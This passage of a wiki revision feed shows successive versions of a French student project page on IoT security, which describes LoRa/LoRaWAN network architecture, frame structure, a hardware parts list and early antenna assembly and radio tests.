 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|400px]]&lt;br /&gt;
[[Fichier:Reception.PNG|400px]]&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Reception.PNG&amp;diff=35693</id>
		<title>Fichier:Reception.PNG</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Reception.PNG&amp;diff=35693"/>
				<updated>2016-12-07T09:59:37Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : a téléversé une nouvelle version de « Fichier:Reception.PNG »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Transmission.PNG&amp;diff=35692</id>
		<title>Fichier:Transmission.PNG</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Transmission.PNG&amp;diff=35692"/>
				<updated>2016-12-07T09:59:19Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35691</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35691"/>
				<updated>2016-12-07T09:59:03Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35690</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35690"/>
				<updated>2016-12-07T09:41:51Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35689</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35689"/>
				<updated>2016-12-07T09:41:20Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
[[Fichier:antenne.jpg]]&lt;/div&gt;</summary>
